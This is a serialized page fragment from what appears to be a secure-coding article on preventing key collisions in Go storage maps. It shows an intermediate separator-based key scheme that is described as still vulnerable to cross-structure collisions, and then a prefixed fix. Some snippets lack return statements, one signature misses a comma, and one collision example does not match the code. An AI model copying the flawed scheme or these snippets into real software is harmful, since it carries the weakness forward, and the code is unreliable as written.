Address",{"type":26,"tag":137,"props":88789,"children":88790},{"style":5573},[88791],{"type":32,"value":23744},{"type":26,"tag":137,"props":88793,"children":88794},{"style":5601},[88795],{"type":32,"value":5875},{"type":26,"tag":137,"props":88797,"children":88798},{"class":5559,"line":6208},[88799,88803,88807],{"type":26,"tag":137,"props":88800,"children":88801},{"style":5584},[88802],{"type":32,"value":17696},{"type":26,"tag":137,"props":88804,"children":88805},{"style":5601},[88806],{"type":32,"value":78830},{"type":26,"tag":137,"props":88808,"children":88809},{"style":6009},[88810],{"type":32,"value":86830},{"type":26,"tag":137,"props":88812,"children":88813},{"class":5559,"line":6225},[88814],{"type":26,"tag":137,"props":88815,"children":88816},{"style":5601},[88817],{"type":32,"value":6507},{"type":26,"tag":137,"props":88819,"children":88820},{"class":5559,"line":6238},[88821,88825,88830],{"type":26,"tag":137,"props":88822,"children":88823},{"style":5573},[88824],{"type":32,"value":35352},{"type":26,"tag":137,"props":88826,"children":88827},{"style":6009},[88828],{"type":32,"value":88829}," AddressMap",{"type":26,"tag":137,"props":88831,"children":88832},{"style":5590},[88833],{"type":32,"value":87720},{"type":26,"tag":137,"props":88835,"children":88836},{"class":5559,"line":6247},[88837,88841,88845,88849,88853,88857,88861,88865,88869,88873,88877,88882,88886],{"type":26,"tag":137,"props":88838,"children":88839},{"style":5573},[88840],{"type":32,"value":87728},{"type":26,"tag":137,"props":88842,"children":88843},{"style":5601},[88844],{"type":32,"value":3016},{"type":26,"tag":137,"props":88846,"children":88847},{"style":6009},[88848],{"type":32,"value":87737},{"type":26,"tag":137,"props":88850,"children":88851},{"style":5601},[88852],{"type":32,"value":3079},{"type":26,"tag":137,"props":88854,"children":88855},{"style":5573},[88856],{"type":32,"value":69703},{"type":26,"tag":137,"props":88858,"children":88859},{"style":5601},[88860],{"type":32,"value":3016},{"type":26,"tag":137,"props":88862,"children":88863},{"style":6009},[88864],{"type":32,"value":87754},{"type":26,"tag":137,"props":88866,"children":88867},{"style":5601},[88868],{"type":32,"value":3079},{"type":26,"tag":137,"props":88870,"children":88871},{"style":5573},[88872],{"type":32,"value":69703},{"type":26,"tag":137,"props":88874,"children":88875},{"style":5601},[88876],{"type":32,"value":3016},{"type":26,"tag":137,"props":88878,"children":88879},{"style":6009},[88880],{"type":32,"value":88881},"AddressName",{"type":26,"tag":137,"props":88883,"children":88884},{"style":5601},[88885],{"type":32,"value":3079},{"type":26,"tag":137,"props":88887,"children":88888},{"style":6009},[88889],{"type":32,"value":88890},"Address\n",{"type":26,"tag":35,"props":88892,"children":88893},{},[88894],{"type":32,"value":88895},"Referencing previous examples, it is necessary to sanitize/encode each key field and add seperators between fields to prevent key collisions. By putting these measures into practice, we present the following implementation below:",{"type":26,"tag":5512,"props":88897,"children":88899},{"code":88898,"language":78767,"meta":7,"className":78768,"style":7},"const (\n    Seperator = \"|\"\n)\n\n\nfunc PositionMapKey(\n    vaultId uint64,\n    username, positionName []byte,\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    positionNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(positionName)),\n    )\n    hex.Encode(positionNameEncoded, positionName)\n\n    key := fmt.Sprintf(\n        \"%d%s%s%s%s\",\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        positionNameEncoded,\n    )\n}\n\n\nfunc AddressMapKey(\n    vaultId uint64,\n    username, addressName []byte\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    addressNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(addressName)),\n    )\n    hex.Encode(addressNameEncoded, addressName)\n\n    key := fmt.Sprintf(\n        \"%d%s%s%s%s\",\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        addressNameEncoded,\n    )\n}\n",[88900],{"type":26,"tag":130,"props":88901,"children":88902},{"__ignoreMap":7},[88903,88914,88929,88936,88943,88950,88966,88981,89008,89031,89050,89066,89102,89109,89144,89151,89171,89186,89221,89228,89263,89270,89298,89310,89322,89334,89346,89357,89369,89376,89383,89390,89397,89413,89428,89452,89475,89494,89509,89544,89551,89586,89593,89613,89628,89663,89670,89706,89713,89740,89751,89762,89773,89784,89795,89807,89814],{"type":26,"tag":137,"props":88904,"children":88905},{"class":5559,"line":5560},[88906,88910],{"type":26,"tag":137,"props":88907,"children":88908},{"style":5573},[88909],{"type":32,"value":12244},{"type":26,"tag":137,"props":88911,"children":88912},{"style":5601},[88913],{"type":32,"value":81168},{"type":26,"tag":137,"props":88915,"children":88916},{"class":5559,"line":5412},[88917,88921,88925],{"type":26,"tag":137,"props":88918,"children":88919},{"style":5584},[88920],{"type":32,"value":87933},{"type":26,"tag":137,"props":88922,"children":88923},{"style":5590},[88924],{"type":32,"value":5593},{"type":26,"tag":137,"props":88926,"children":88927},{"style":6837},[88928],{"type":32,"value":87942},{"type":26,"tag":137,"props":88930,"children":88931},{"class":5559,"line":5417},[88932],{"type":26,"tag":137,"props":88933,"children":88934},{"style":5601},[88935],{"type":32,"value":5742},{"type":26,"tag":137,"props":88937,"children":88938},{"class":5559,"line":5642},[88939],{"type":26,"tag":137,"props":88940,"children":88941},{"emptyLinePlaceholder":18},[88942],{"type":32,"value":6276},{"type":26,"tag":137,"props":88944,"children":88945},{"class":5559,"line":5745},[88946],{"type":26,"tag":137,"props":88947,"children":88948},{"emptyLinePlaceholder":18},[88949],{"type":32,"value":6276},{"type":26,"tag":137,"props":88951,"children":88952},{"class":5559,"line":5850},[88953,88957,88962],{"type":26,"tag":137,"props":88954,"children":88955},{"style":5573},[88956],{"type":32,"value":78903},{"type":26,"tag":137,"props":88958,"children":88959},{"style":5682},[88960],{"type":32,"value":88961}," PositionMapKey",{"type":26,"tag":137,"props":88963,"children":88964},{"style":5601},[88965],{"type":32,"value":6054},{"type":26,"tag":137,"props":88967,"children":88968},{"class":5559,"line":5878},[88969,88973,88977],{"type":26,"tag":137,"props":88970,"children":88971},{"style":5584},[88972],{"type":32,"value":87849},{"type":26,"tag":137,"props":88974,"children":88975},{"style":6009},[88976],{"type":32,"value":79024},{"type":26,"tag":137,"props":88978,"children":88979},{"style":5601},[88980],{"type":32,"value":6099},{"type":26,"tag":137,"props":88982,"children":88983},{"class":5559,"line":5891},[88984,88988,88992,88996,89000,89004],{"type":26,"tag":137,"props":88985,"children":88986},{"style":5584},[88987],{"type":32,"value":87861},{"type":26,"tag":137,"props":88989,"children":88990},{"style":5601},[88991],{"type":32,"value":1108},{"type":26,"tag":137,"props":88993,"children":88994},{"style":5584},[88995],{"type":32,"value":88342},{"type":26,"tag":137,"props":88997,"children":88998},{"style":5601},[88999],{"type":32,"value":78830},{"type":26,"tag":137,"props":89001,"children":89002},{"style":6009},[89003],{"type":32,"value":87367},{"type":26,"tag":137,"props":89005,"children":89006},{"style":5601},[89007],{"type":32,"value":6099},{"type":26,"tag":137,"props":89009,"children":89010},{"class":5559,"line":5909},[89011,89015,89019,89023,89027],{"type":26,"tag":137,"props":89012,"children":89013},{"style":5601},[89014],{"type":32,"value":78985},{"type":26,"tag":137,"props":89016,"children":89017},{"style":5584},[89018],{"type":32,"value":74757},{"type":26,"tag":137,"props":89020,"children":89021},{"style":5601},[89022],{"type":32,"value":78830},{"type":26,"tag":137,"props":89024,"children":89025},{"style":6009},[89026],{"type":32,"value":87367},{"type":26,"tag":137,"props":89028,"children":89029},{"style":5601},[89030],{"type":32,"value":17395},{"type":26,"tag":137,"props":89032,"children":89033},{"class":5559,"line":5930},[89034,89038,89042,89046],{"type":26,"tag":137,"props":89035,"children":89036},{"style":5584},[89037],{"type":32,"value":88463},{"type":26,"tag":137,"props":89039,"children":89040},{"style":5590},[89041],{"type":32,"value":79019},{"type":26,"tag":137,"props":89043,"children":89044},{"style":5682},[89045],{"type":32,"value":88166},{"type":26,"tag":137,"props":89047,"children":89048},{"style":5601},[89049],{"type":32,"value":6054},{"type":26,"tag":137,"props":89051,"children":89052},{"class":5559,"line":5939},[89053,89058,89062],{"type":26,"tag":137,"props":89054,"children":89055},{"style":5601},[89056],{"type":32,"value":89057},"        []",{"type":26,"tag":137,"props":89059,"children":89060},{"style":6009},[89061],{"type":32,"value":87367},{"type":26,"tag":137,"props":89063,"children":89064},{"style":5601},[89065],{"type":32,"value":6099},{"type":26,"tag":137,"props":89067,"children":89068},{"class":5559,"line":6191},[89069,89074,89078,89082,89086,89090,89094,89098],{"type":26,"tag":137,"props":89070,"children":89071},{"style":5584},[89072],{"type":32,"value":89073},"        hex",{"type":26,"tag":137,"props":89075,"children":89076},{"style":5601},[89077],{"type":32,"value":470},{"type":26,"tag":137,"props":89079,"children":89080},{"style":5682},[89081],{"type":32,"value":88203},{"type":26,"tag":137,"props":89083,"children":89084},{"style":5601},[89085],{"type":32,"value":165},{"type":26,"tag":137,"props":89087,"children":89088},{"style":5682},[89089],{"type":32,"value":11727},{"type":26,"tag":137,"props":89091,"children":89092},{"style":5601},[89093],{"type":32,"value":165},{"type":26,"tag":137,"props":89095,"children":89096},{"style":5584},[89097],{"type":32,"value":88073},{"type":26,"tag":137,"props":89099,"children":89100},{"style":5601},[89101],{"type":32,"value":88224},{"type":26,"tag":137,"props":89103,"children":89104},{"class":5559,"line":6208},[89105],{"type":26,"tag":137,"props":89106,"children":89107},{"style":5601},[89108],{"type":32,"value":26510},{"type":26,"tag":137,"props":89110,"children":89111},{"class":5559,"line":6225},[89112,89116,89120,89124,89128,89132,89136,89140],{"type":26,"tag":137,"props":89113,"children":89114},{"style":5584},[89115],{"type":32,"value":88194},{"type":26,"tag":137,"props":89117,"children":89118},{"style":5601},[89119],{"type":32,"value":470},{"type":26,"tag":137,"props":89121,"children":89122},{"style":5682},[89123],{"type":32,"value":88248},{"type":26,"tag":137,"props":89125,"children":89126},{"style":5601},[89127],{"type":32,"value":165},{"type":26,"tag":137,"props":89129,"children":89130},{"style":5584},[89131],{"type":32,"value":88157},{"type":26,"tag":137,"props":89133,"children":89134},{"style":5601},[89135],{"type":32,"value":1108},{"type":26,"tag":137,"props":89137,"children":89138},{"style":5584},[89139],{"type":32,"value":88073},{"type":26,"tag":137,"props":89141,"children":89142},{"style":5601},[89143],{"type":32,"value":5742},{"type":26,"tag":137,"props":89145,"children":89146},{"class":5559,"line":6238},[89147],{"type":26,"tag":137,"props":89148,"children":89149},{"emptyLinePlaceholder":18},[89150],{"type":32,"value":6276},{"type":26,"tag":137,"props":89152,"children":89153},{"class":5559,"line":6247},[89154,89159,89163,89167],{"type":26,"tag":137,"props":89155,"children":89156},{"style":5584},[89157],{"type":32,"value":89158},"    positionNameEncoded",{"type":26,"tag":137,"props":89160,"children":89161},{"style":5590},[89162],{"type":32,"value":79019},{"type":26,"tag":137,"props":89164,"children":89165},{"style":5682},[89166],{"type":32,"value":88166},{"type":26,"tag":137,"props":89168,"children":89169},{"style":5601},[89170],{"type":32,"value":6054},{"type":26,"tag":137,"props":89172,"children":89173},{"class":5559,"line":6270},[89174,89178,89182],{"type":26,"tag":137,"props":89175,"children":89176},{"style":5601},[89177],{"type":32,"value":89057},{"type":26,"tag":137,"props":89179,"children":89180},{"style":6009},[89181],{"type":32,"value":87367},{"type":26,"tag":137,"props":89183,"children":89184},{"style":5601},[89185],{"type":32,"value":6099},{"type":26,"tag":137,"props":89187,"children":89188},{"class":5559,"line":6279},[89189,89193,89197,89201,89205,89209,89213,89217],{"type":26,"tag":137,"props":89190,"children":89191},{"style":5584},[89192],{"type":32,"value":89073},{"type":26,"tag":137,"props":89194,"children":89195},{"style":5601},[89196],{"type":32,"value":470},{"type":26,"tag":137,"props":89198,"children":89199},{"style":5682},[89200],{"type":32,"value":88203},{"type":26,"tag":137,"props":89202,"children":89203},{"style":5601},[89204],{"type":32,"value":165},{"type":26,"tag":137,"props":89206,"children":89207},{"style":5682},[89208],{"type":32,"value":11727},{"type":26,"tag":137,"props":89210,"children":89211},{"style":5601},[89212],{"type":32,"value":165},{"type":26,"tag":137,"props":89214,"children":89215},{"style":5584},[89216],{"type":32,"value":88342},{"type":26,"tag":137,"props":89218,"children":89219},{"style":5601},[89220],{"type":32,"value":88224},{"type":26,"tag":137,"props":89222,"children":89223},{"class":5559,"line":6288},[89224],{"type":26,"tag":137,"props":89225,"children":89226},{"style":5601},[89227],{"type":32,"value":26510},{"type":26,"tag":137,"props":89229,"children":89230},{"class":5559,"line":6355},[89231,89235,89239,89243,89247,89251,89255,89259],{"type":26,"tag":137,"props":89232,"children":89233},{"style":5584},[89234],{"type":32,"value":88194},{"type":26,"tag":137,"props":89236,"children":89237},{"style":5601},[89238],{"type":32,"value":470},{"type":26,"tag":137,"props":89240,"children":89241},{"style":5682},[89242],{"type":32,"value":88248},{"type":26,"tag":137,"props":89244,"children":89245},{"style":5601},[89246],{"type":32,"value":165},{"type":26,"tag":137,"props":89248,"children":89249},{"style":5584},[89250],{"type":32,"value":88283},{"type":26,"tag":137,"props":89252,"children":89253},{"style":5601},[89254],{"type":32,"value":1108},{"type":26,"tag":137,"props":89256,"children":89257},{"style":5584},[89258],{"type":32,"value":88342},{"type":26,"tag":137,"props":89260,"children":89261},{"style":5601},[89262],{"type":32,"value":5742},{"type":26,"tag":137,"props":89264,"children":89265},{"class":5559,"line":6363},[89266],{"type":26,"tag":137,"props":89267,"children":89268},{"emptyLinePlaceholder":18},[89269],{"type":32,"value":6276},{"type":26,"tag":137,"props":89271,"children":89272},{"class":5559,"line":6393},[89273,89278,89282,89286,89290,89294],{"type":26,"tag":137,"props":89274,"children":89275},{"style":5584},[89276],{"type":32,"value":89277},"    key",{"type":26,"tag":137,"props":89279,"children":89280},{"style":5590},[89281],{"type":32,"value":79019},{"type":26,"tag":137,"props":89283,"children":89284},{"style":5584},[89285],{"type":32,"value":84836},{"type":26,"tag":137,"props":89287,"children":89288},{"style":5601},[89289],{"type":32,"value":470},{"type":26,"tag":137,"props":89291,"children":89292},{"style":5682},[89293],{"type":32,"value":87825},{"type":26,"tag":137,"props":89295,"children":89296},{"style":5601},[89297],{"type":32,"value":6054},{"type":26,"tag":137,"props":89299,"children":89300},{"class":5559,"line":6401},[89301,89306],{"type":26,"tag":137,"props":89302,"children":89303},{"style":6837},[89304],{"type":32,"value":89305},"        \"%d%s%s%s%s\"",{"type":26,"tag":137,"props":89307,"children":89308},{"style":5601},[89309],{"type":32,"value":6099},{"type":26,"tag":137,"props":89311,"children":89312},{"class":5559,"line":6433},[89313,89318],{"type":26,"tag":137,"props":89314,"children":89315},{"style":5584},[89316],{"type":32,"value":89317},"        vaultId",{"type":26,"tag":137,"props":89319,"children":89320},{"style":5601},[89321],{"type":32,"value":6099},{"type":26,"tag":137,"props":89323,"children":89324},{"class":5559,"line":6441},[89325,89330],{"type":26,"tag":137,"props":89326,"children":89327},{"style":5584},[89328],{"type":32,"value":89329},"        Seperator",{"type":26,"tag":137,"props":89331,"children":89332},{"style":5601},[89333],{"type":32,"value":6099},{"type":26,"tag":137,"props":89335,"children":89336},{"class":5559,"line":6501},[89337,89342],{"type":26,"tag":137,"props":89338,"children":89339},{"style":5584},[89340],{"type":32,"value":89341},"        usernameEncoded",{"type":26,"tag":137,"props":89343,"children":89344},{"style":5601},[89345],{"type":32,"value":6099},{"type":26,"tag":137,"props":89347,"children":89348},{"class":5559,"line":11634},[89349,89353],{"type":26,"tag":137,"props":89350,"children":89351},{"style":5584},[89352],{"type":32,"value":89329},{"type":26,"tag":137,"props":89354,"children":89355},{"style":5601},[89356],{"type":32,"value":6099},{"type":26,"tag":137,"props":89358,"children":89359},{"class":5559,"line":11652},[89360,89365],{"type":26,"tag":137,"props":89361,"children":89362},{"style":5584},[89363],{"type":32,"value":89364},"        positionNameEncoded",{"type":26,"tag":137,"props":89366,"children":89367},{"style":5601},[89368],{"type":32,"value":6099},{"type":26,"tag":137,"props":89370,"children":89371},{"class":5559,"line":11697},[89372],{"type":26,"tag":137,"props":89373,"children":89374},{"style":5601},[89375],{"type":32,"value":26510},{"type":26,"tag":137,"props":89377,"children":89378},{"class":5559,"line":11803},[89379],{"type":26,"tag":137,"props":89380,"children":89381},{"style":5601},[89382],{"type":32,"value":6507},{"type":26,"tag":137,"props":89384,"children":89385},{"class":5559,"line":26089},[89386],{"type":26,"tag":137,"props":89387,"children":89388},{"emptyLinePlaceholder":18},[89389],{"type":32,"value":6276},{"type":26,"tag":137,"props":89391,"children":89392},{"class":5559,"line":26124},[89393],{"type":26,"tag":137,"props":89394,"children":89395},{"emptyLinePlaceholder":18},[89396],{"type":32,"value":6276},{"type":26,"tag":137,"props":89398,"children":89399},{"class":5559,"line":26132},[89400,89404,89409],{"type":26,"tag":137,"props":89401,"children":89402},{"style":5573},[89403],{"type":32,"value":78903},{"type":26,"tag":137,"props":89405,"children":89406},{"style":5682},[89407],{"type":32,"value":89408}," AddressMapKey",{"type":26,"tag":137,"props":89410,"children":89411},{"style":5601},[89412],{"type":32,"value":6054},{"type":26,"tag":137,"props":89414,"children":89415},{"class":5559,"line":26140},[89416,89420,89424],{"type":26,"tag":137,"props":89417,"children":89418},{"style":5584},[89419],{"type":32,"value":87849},{"type":26,"tag":137,"props":89421,"children":89422},{"style":6009},[89423],{"type":32,"value":79024},{"type":26,"tag":137,"props":89425,"children":89426},{"style":5601},[89427],{"type":32,"value":6099},{"type":26,"tag":137,"props":89429,"children":89430},{"class":5559,"line":26149},[89431,89435,89439,89444,89448],{"type":26,"tag":137,"props":89432,"children":89433},{"style":5584},[89434],{"type":32,"value":87861},{"type":26,"tag":137,"props":89436,"children":89437},{"style":5601},[89438],{"type":32,"value":1108},{"type":26,"tag":137,"props":89440,"children":89441},{"style":5584},[89442],{"type":32,"value":89443},"addressName",{"type":26,"tag":137,"props":89445,"children":89446},{"style":5601},[89447],{"type":32,"value":78830},{"type":26,"tag":137,"props":89449,"children":89450},{"style":6009},[89451],{"type":32,"value":86830},{"type":26,"tag":137,"props":89453,"children":89454},{"class":5559,"line":26191},[89455,89459,89463,89467,89471],{"type":26,"tag":137,"props":89456,"children":89457},{"style":5601},[89458],{"type":32,"value":78985},{"type":26,"tag":137,"props":89460,"children":89461},{"style":5584},[89462],{"type":32,"value":74757},{"type":26,"tag":137,"props":89464,"children":89465},{"style":5601},[89466],{"type":32,"value":78830},{"type":26,"tag":137,"props":89468,"children":89469},{"style":6009},[89470],{"type":32,"value":87367},{"type":26,"tag":137,"props":89472,"children":89473},{"style":5601},[89474],{"type":32,"value":17395},{"type":26,"tag":137,"props":89476,"children":89477},{"class":5559,"line":26224},[89478,89482,89486,89490],{"type":26,"tag":137,"props":89479,"children":89480},{"style":5584},[89481],{"type":32,"value":88463},{"type":26,"tag":137,"props":89483,"children":89484},{"style":5590},[89485],{"type":32,"value":79019},{"type":26,"tag":137,"props":89487,"children":89488},{"style":5682},[89489],{"type":32,"value":88166},{"type":26,"tag":137,"props":89491,"children":89492},{"style":5601},[89493],{"type":32,"value":6054},{"type":26,"tag":137,"props":89495,"children":89496},{"class":5559,"line":26232},[89497,89501,89505],{"type":26,"tag":137,"props":89498,"children":89499},{"style":5601},[89500],{"type":32,"value":89057},{"type":26,"tag":137,"props":89502,"children":89503},{"style":6009},[89504],{"type":32,"value":87367},{"type":26,"tag":137,"props":89506,"children":89507},{"style":5601},[89508],{"type":32,"value":6099},{"type":26,"tag":137,"props":89510,"children":89511},{"class":5559,"line":26240},[89512,89516,89520,89524,89528,89532,89536,89540],{"type":26,"tag":137,"props":89513,"children":89514},{"style":5584},[89515],{"type":32,"value":89073},{"type":26,"tag":137,"props":89517,"children":89518},{"style":5601},[89519],{"type":32,"value":470},{"type":26,"tag":137,"props":89521,"children":89522},{"style":5682},[89523],{"type":32,"value":88203},{"type":26,"tag":137,"props":89525,"children":89526},{"style":5601},[89527],{"type":32,"value":165},{"type":26,"tag":137,"props":89529,"children":89530},{"style":5682},[89531],{"type":32,"value":11727},{"type":26,"tag":137,"props":89533,"children":89534},{"style":5601},[89535],{"type":32,"value":165},{"type":26,"tag":137,"props":89537,"children":89538},{"style":5584},[89539],{"type":32,"value":88073},{"type":26,"tag":137,"props":89541,"children":89542},{"style":5601},[89543],{"type":32,"value":88224},{"type":26,"tag":137,"props":89545,"children":89546},{"class":5559,"line":26249},[89547],{"type":26,"tag":137,"props":89548,"children":89549},{"style":5601},[89550],{"type":32,"value":26510},{"type":26,"tag":137,"props":89552,"children":89553},{"class":5559,"line":26325},[89554,89558,89562,89566,89570,89574,89578,89582],{"type":26,"tag":137,"props":89555,"children":89556},{"style":5584},[89557],{"type":32,"value":88194},{"type":26,"tag":137,"props":89559,"children":89560},{"style":5601},[89561],{"type":32,"value":470},{"type":26,"tag":137,"props":89563,"children":89564},{"style":5682},[89565],{"type":32,"value":88248},{"type":26,"tag":137,"props":89567,"children":89568},{"style":5601},[89569],{"type":32,"value":165},{"type":26,"tag":137,"props":89571,"children":89572},{"style":5584},[89573],{"type":32,"value":88157},{"type":26,"tag":137,"props":89575,"children":89576},{"style":5601},[89577],{"type":32,"value":1108},{"type":26,"tag":137,"props":89579,"children":89580},{"style":5584},[89581],{"type":32,"value":88073},{"type":26,"tag":137,"props":89583,"children":89584},{"style":5601},[89585],{"type":32,"value":5742},{"type":26,"tag":137,"props":89587,"children":89588},{"class":5559,"line":26358},[89589],{"type":26,"tag":137,"props":89590,"children":89591},{"emptyLinePlaceholder":18},[89592],{"type":32,"value":6276},{"type":26,"tag":137,"props":89594,"children":89595},{"class":5559,"line":26366},[89596,89601,89605,89609],{"type":26,"tag":137,"props":89597,"children":89598},{"style":5584},[89599],{"type":32,"value":89600},"    addressNameEncoded",{"type":26,"tag":137,"props":89602,"children":89603},{"style":5590},[89604],{"type":32,"value":79019},{"type":26,"tag":137,"props":89606,"children":89607},{"style":5682},[89608],{"type":32,"value":88166},{"type":26,"tag":137,"props":89610,"children":89611},{"style":5601},[89612],{"type":32,"value":6054},{"type":26,"tag":137,"props":89614,"children":89615},{"class":5559,"line":26374},[89616,89620,89624],{"type":26,"tag":137,"props":89617,"children":89618},{"style":5601},[89619],{"type":32,"value":89057},{"type":26,"tag":137,"props":89621,"children":89622},{"style":6009},[89623],{"type":32,"value":87367},{"type":26,"tag":137,"props":89625,"children":89626},{"style":5601},[89627],{"type":32,"value":6099},{"type":26,"tag":137,"props":89629,"children":89630},{"class":5559,"line":26411},[89631,89635,89639,89643,89647,89651,89655,89659],{"type":26,"tag":137,"props":89632,"children":89633},{"style":5584},[89634],{"type":32,"value":89073},{"type":26,"tag":137,"props":89636,"children":89637},{"style":5601},[89638],{"type":32,"value":470},{"type":26,"tag":137,"props":89640,"children":89641},{"style":5682},[89642],{"type":32,"value":88203},{"type":26,"tag":137,"props":89644,"children":89645},{"style":5601},[89646],{"type":32,"value":165},{"type":26,"tag":137,"props":89648,"children":89649},{"style":5682},[89650],{"type":32,"value":11727},{"type":26,"tag":137,"props":89652,"children":89653},{"style":5601},[89654],{"type":32,"value":165},{"type":26,"tag":137,"props":89656,"children":89657},{"style":5584},[89658],{"type":32,"value":89443},{"type":26,"tag":137,"props":89660,"children":89661},{"style":5601},[89662],{"type":32,"value":88224},{"type":26,"tag":137,"props":89664,"children":89665},{"class":5559,"line":26424},[89666],{"type":26,"tag":137,"props":89667,"children":89668},{"style":5601},[89669],{"type":32,"value":26510},{"type":26,"tag":137,"props":89671,"children":89672},{"class":5559,"line":26437},[89673,89677,89681,89685,89689,89694,89698,89702],{"type":26,"tag":137,"props":89674,"children":89675},{"style":5584},[89676],{"type":32,"value":88194},{"type":26,"tag":137,"props":89678,"children":89679},{"style":5601},[89680],{"type":32,"value":470},{"type":26,"tag":137,"props":89682,"children":89683},{"style":5682},[89684],{"type":32,"value":88248},{"type":26,"tag":137,"props":89686,"children":89687},{"style":5601},[89688],{"type":32,"value":165},{"type":26,"tag":137,"props":89690,"children":89691},{"style":5584},[89692],{"type":32,"value":89693},"addressNameEncoded",{"type":26,"tag":137,"props":89695,"children":89696},{"style":5601},[89697],{"type":32,"value":1108},{"type":26,"tag":137,"props":89699,"children":89700},{"style":5584},[89701],{"type":32,"value":89443},{"type":26,"tag":137,"props":89703,"children":89704},{"style":5601},[89705],{"type":32,"value":5742},{"type":26,"tag":137,"props":89707,"children":89708},{"class":5559,"line":26450},[89709],{"type":26,"tag":137,"props":89710,"children":89711},{"emptyLinePlaceholder":18},[89712],{"type":32,"value":6276},{"type":26,"tag":137,"props":89714,"children":89715},{"class":5559,"line":26504},[89716,89720,89724,89728,89732,89736],{"type":26,"tag":137,"props":89717,"children":89718},{"style":5584},[89719],{"type":32,"value":89277},{"type":26,"tag":137,"props":89721,"children":89722},{"style":5590},[89723],{"type":32,"value":79019},{"type":26,"tag":137,"props":89725,"children":89726},{"style":5584},[89727],{"type":32,"value":84836},{"type":26,"tag":137,"props":89729,"children":89730},{"style":5601},[89731],{"type":32,"value":470},{"type":26,"tag":137,"props":89733,"children":89734},{"style":5682},[89735],{"type":32,"value":87825},{"type":26,"tag":137,"props":89737,"children":89738},{"style":5601},[89739],{"type":32,"value":6054},{"type":26,"tag":137,"props":89741,"children":89742},{"class":5559,"line":26513},[89743,89747],{"type":26,"tag":137,"props":89744,"children":89745},{"style":6837},[89746],{"type":32,"value":89305},{"type":26,"tag":137,"props":89748,"children":89749},{"style":5601},[89750],{"type":32,"value":6099},{"type":26,"tag":137,"props":89752,"children":89753},{"class":5559,"line":34876},[89754,89758],{"type":26,"tag":137,"props":89755,"children":89756},{"style":5584},[89757],{"type":32,"value":89317},{"type":26,"tag":137,"props":89759,"children":89760},{"style":5601},[89761],{"type":32,"value":6099},{"type":26,"tag":137,"props":89763,"children":89764},{"class":5559,"line":34897},[89765,89769],{"type":26,"tag":137,"props":89766,"children":89767},{"style":5584},[89768],{"type":32,"value":89329},{"type":26,"tag":137,"props":89770,"children":89771},{"style":5601},[89772],{"type":32,"value":6099},{"type":26,"tag":137,"props":89774,"children":89775},{"class":5559,"line":83553},[89776,89780],{"type":26,"tag":137,"props":89777,"children":89778},{"style":5584},[89779],{"type":32,"value":89341},{"type":26,"tag":137,"props":89781,"children":89782},{"style":5601},[89783],{"type":32,"value":6099},{"type":26,"tag":137,"props":89785,"children":89786},{"class":5559,"line":83566},[89787,89791],{"type":26,"tag":137,"props":89788,"children":89789},{"style":5584},[89790],{"type":32,"value":89329},{"type":26,"tag":137,"props":89792,"children":89793},{"style":5601},[89794],{"type":32,"value":6099},{"type":26,"tag":137,"props":89796,"children":89797},{"class":5559,"line":83574},[89798,89803],{"type":26,"tag":137,"props":89799,"children":89800},{"style":5584},[89801],{"type":32,"value":89802},"        addressNameEncoded",{"type":26,"tag":137,"props":89804,"children":89805},{"style":5601},[89806],{"type":32,"value":6099},{"type":26,"tag":137,"props":89808,"children":89809},{"class":5559,"line":83582},[89810],{"type":26,"tag":137,"props":89811,"children":89812},{"style":5601},[89813],{"type":32,"value":26510},{"type":26,"tag":137,"props":89815,"children":89816},{"class":5559,"line":83590},[89817],{"type":26,"tag":137,"props":89818,"children":89819},{"style":5601},[89820],{"type":32,"value":6507},{"type":26,"tag":35,"props":89822,"children":89823},{},[89824,89826,89831],{"type":32,"value":89825},"Unfortunately, when dealing with more than one storage entry within the same ",{"type":26,"tag":130,"props":89827,"children":89829},{"className":89828},[],[89830],{"type":32,"value":87579},{"type":32,"value":89832},", the previous implementation is not enough to guarantee key uniqueness. While it still effectively prevents key collisions within each individual structure, it does not prevent cross-structure key collisions.",{"type":26,"tag":5512,"props":89834,"children":89836},{"code":89835},"vaultId = 1, username = \"a\", positionName = \"b\"\n    => PositionMapKey = \"1|a|b\"\n\nvaultId = 1, username = \"a\", addressName = \"b\"\n    => AddressMapKey = \"1|a||b\"\n",[89837],{"type":26,"tag":130,"props":89838,"children":89839},{"__ignoreMap":7},[89840],{"type":32,"value":89835},{"type":26,"tag":35,"props":89842,"children":89843},{},[89844],{"type":32,"value":89845},"To prevent this, add a structure-specific prefix to the start of each key to act as a domain separator.",{"type":26,"tag":5512,"props":89847,"children":89849},{"code":89848,"language":78767,"meta":7,"className":78768,"style":7},"const (\n    Seperator = \"|\"\n    PositionMapPrefix = \"\\x01\"\n    AddressMapPrefix = \"\\x02\"\n)\n\n\nfunc PositionMapKey(\n    vaultId uint64,\n    username, positionName []byte,\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    positionNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(positionName)),\n    )\n    hex.Encode(positionNameEncoded, positionName)\n\n    key := fmt.Sprintf(\n        \"%s%d%s%s%s%s\",\n        PositionMapPrefix,\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        positionNameEncoded,\n    )\n}\n\n\nfunc AddressMapKey(\n    vaultId uint64,\n    username, addressName []byte,\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    addressNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(addressName)),\n    )\n    hex.Encode(addressNameEncoded, addressName)\n\n    key := fmt.Sprintf(\n        \"%s%d%s%s%s%s\",\n        AddressMapPrefix,\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        addressNameEncoded,\n    